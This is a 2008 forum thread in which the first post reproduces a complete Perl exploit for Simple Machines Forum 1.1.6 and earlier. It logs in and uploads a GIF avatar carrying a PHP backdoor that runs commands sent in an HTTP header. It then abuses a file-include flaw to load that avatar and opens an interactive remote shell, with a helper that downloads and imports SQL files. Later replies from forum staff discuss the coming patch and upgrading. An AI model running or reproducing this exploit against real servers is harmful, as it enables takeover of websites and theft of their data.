Simple Machines Forum Code Execution

Started by DarkGênesis, November 06, 2008, 05:04:24 PM

Previous topic - Next topic
Print
Go Down Pages1
User actions

DarkGênesis

November 06, 2008, 05:04:24 PM Last Edit: November 06, 2008, 08:34:26 PM by DarkGênesis
This exploit is already going through various hacker sites. Already it's time to leave the version 1.1.7 because this bug is critical.
Waiting ...

Code Select
#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that
killed rgod.
#         We can't thank you enough for killing a bug killer.
# @bug  : Sources/QueryString.php  & Sources/Themes.php w/
magic_quotes == Off
# @gr33t: m0rt's failure,  it never stops.
#
# C:\Documents and Settings\molest>perl
P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd at win32]$ ver
#
# Mcft Windows XP [Version 5.1.2600]
#
# [cmd at win32]$
#
#  FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla
FireFox" );
my %parms = (   s => "",
              d => 0,
              x => sub { print "[**] Proxy found, using $_[1]\n"; $ua-
>proxy(['http'], $_[1]); },
              u => "Gl0ria!!!",
              p => "gl0ria\@herb3st" );

GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";

if( !$parms{s} ) {
      die <<HELP
[ii] usage: $0 <parms>
   [-s]    Site        -> http://site.com/forums
   [-x]   Proxy       -> localhost:8118
   [-u]   Username    -> Gl0ria!!!
   [-p]    Password    -> gl0ria\@herb3st
   [-d]    Debug
HELP
}

my $shell =
chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
         chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
         chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
         chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
         chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
         chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
         chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
         chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00); $shell .= <<'EXIF';
<?php
error_reporting(0);ini_set('max_execution_time',0);
$x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe
_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' :
'0');
if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
print '---1243---';if($z){print eval($x);}else{print
passthru($x);}print '---3421---';exit;
?>
EXIF
         $shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
         chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
         chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
         chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
         chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
         chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
         chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
         chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
         chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
         chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
         chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
         chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
         chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
         chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
         chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
         chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
         chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
         chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
         chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
         chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
         chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
         chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
         chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
         chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
         chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
         chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
         chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
         chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
         chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
         chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
         chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
         chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
         chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
         chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
         chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
         chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
         chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
         chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
         chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
         chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
         chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
         chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
         chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
         chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
         chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
         chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
         chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
         chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
         chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
         chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
         chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
         chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
         chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
         chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
         chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
         chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
         chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
         chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
         chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
         chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
         chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
         chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
         chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
         chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
         chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
         chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
         chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
         chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
         chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
         chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
         chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
         chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
         chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
         chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
         chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
         chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2",
      [
         user         => $parms{u},
         passwrd         => $parms{p},
         cookielength   => -1
      ]);

## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");

die "[!!] Wrong username/password\n"
   unless $ret->as_string !~ /The user whose profile you are trying
to view does not exist/;

die "[!!] Error getting session id\n"
   unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;

die "[!!] Error getting id\n"
   unless my($id) = $ret->as_string =~ /u=(\d+);/;

print "[ii] Session ID = $sid\n".
      "[ii] User Id = $id\n" if $parms{d};

## Checking for shell
$ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => "echo expl0ited");

&shell
   if $ret->as_string =~ /expl0ited/;

$ret = $ua->request(
      POST "$parms{s}/index.php?action=profile2",
      Content_Type   => 'multipart/form-data',
      Content         =>
      [
         avatar_choice   => "upload",
         sc            => $sid,
         userID         => $id,
         sa            => "forumProfile",
         attachment      =>
         [
            undef,
            "expl0ited.gif",
            Content         => $shell,
            "Content-Type"   => "image/gif"
         ]
      ]);

## Updating Settings.php
$ret = $ua-
>get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=them
e_dir;val=./attachments/avatar_${id}.gif\%2500");

print "[ii] Uploaded a shell...\n"
    if $parms{d};

shell();

## lulz @ this ******.
sub shell {
   my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
    $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => '0998' );
    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---
/s;

   die "[!!] magic_quotes is turned on\n"
      if (not defined $os or not defined $sh or $1 eq $id);

    $sh = $sh ? "php" : "cmd";
    $os = $os =~ /win/i ? "win32" : "unix";

    do {
      print "[$sh\@$os]\$ ";
      $cmd = chomp (my $cmd = <STDIN>);


      exit
         unless $cmd !~ /^exit$/i;

        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
            $cmd =~ s/savefile $1 //;
        } else { undef $file; }

        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?)
(.*?)$/ ) {
            ($base) = $full =~ /\/(.*?)$/;
            $cmd = "cd attachments;wget $full; mysql --user=$user --
password=$pass < $base; rm $base;";
        }

        $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => $cmd);
        $ret->as_string =~ /---1243---(.*?)---3421---/s;
        print "$1\n";

        if( defined $file ) {
            open FILE, ">>", $file or die "[!!] Error writing to
file; $!\n";
            print FILE "Command Executed: $cmd\n".
                       "Host: $parms{s}\n$1\n";
            close FILE;
        }
   } while( $cmd !~ /^exit$/i );

   exit;
}

metallica48423

#1
November 06, 2008, 05:27:42 PM
we know of this already.  There will be a patch issued for it once it is tested and verified to actually fix the security hole.

Thanks!
Justin O'Leary
Ex-Project Manager
Ex-Lead Support Specialist

QuoteMicrosoft wants us to "Imagine life without walls"...
I say, "If there are no walls, who needs Windows?"


Useful Links:
Online Manual!
How to Help us Help you
Search
Settings Repair Tool

DarkGênesis

#2
November 06, 2008, 05:30:10 PM Last Edit: November 06, 2008, 05:32:23 PM by DarkGênesis
I like to know ..
Thank you. :D

  •   That day intend to launch the correction?

metallica48423

#3
November 06, 2008, 07:28:55 PM
i don't have an ETA.  the goal is by the end of the weekend.  It is time consuming as they first must be able to replicate the exploit and then find out how they can block it from happening under all circumstances.  Rest assured that the devs are hard at work on it.
Justin O'Leary
Ex-Project Manager
Ex-Lead Support Specialist

QuoteMicrosoft wants us to "Imagine life without walls"...
I say, "If there are no walls, who needs Windows?"


Useful Links:
Online Manual!
How to Help us Help you
Search
Settings Repair Tool

DarkGênesis

#4
November 06, 2008, 08:33:53 PM
Thank you.   :D

WHK

#5
November 06, 2008, 09:42:35 PM Last Edit: November 06, 2008, 09:44:48 PM by zkizzik2
baa no es nada del otro mundo, no se porque dices que se complican tanto testeando tantas veces si lo unico que hay que hacer es agregar un sesc a la función de instalaciones de paquetes y agregar un hash de 5 carácteres al archivo adjunto y evitas los XSRF y ya.

Sobre la segunda falla LFI en la variable $_GET['val'] es simple igual, utilizar un id en el archivo a incluir y no llamar directamente la ruta.

Esas cosas se solucionan hasta en 2 horas a lo mucho y no en semanas joder!

http://milw0rm.com/exploits/7011
http://milw0rm.com/exploits/6993

1923

#6
November 07, 2008, 11:59:49 AM
I just want to know. I have installed some mods. After upgrade to 1.1.7 i need to install that mods again?

Kermit

#7
November 07, 2008, 12:02:35 PM
Quote from: 1923 on November 07, 2008, 11:59:49 AM
I just want to know. I have installed some mods. After upgrade to 1.1.7 i need to install that mods again?


After 1.1.7 is out,you will see probably a patch for 1.1.6 to 1.1.7 on your admincp,if you use this,you wouldn't lose your modifications
My Mods
Please don't PM/mail me for support,unless i invite you
Formerly known as Duncan85
Quote
"Two things are infinite: the universe and human stupidity; and I'm not sure about the the universe."

A. Einstein

1923

#8
November 07, 2008, 12:05:29 PM
Quote from: Duncan85 on November 07, 2008, 12:02:35 PM
Quote from: 1923 on November 07, 2008, 11:59:49 AM
I just want to know. I have installed some mods. After upgrade to 1.1.7 i need to install that mods again?


After 1.1.7 is out,you will see probably a patch for 1.1.6 to 1.1.7 on your admincp,if you use this,you wouldn't lose your modifications


Yes,after is out. I do the upgrades through FTP.
If i use ftp i lose the modifications>? Thanks. :)

metallica48423

#9
November 07, 2008, 01:25:20 PM
if you full overwrite, then yes you'll need to reinstall your modifications
Justin O'Leary
Ex-Project Manager
Ex-Lead Support Specialist

QuoteMicrosoft wants us to "Imagine life without walls"...
I say, "If there are no walls, who needs Windows?"


Useful Links:
Online Manual!
How to Help us Help you
Search
Settings Repair Tool
Print
Go Up Pages1
User actions
Advertisement: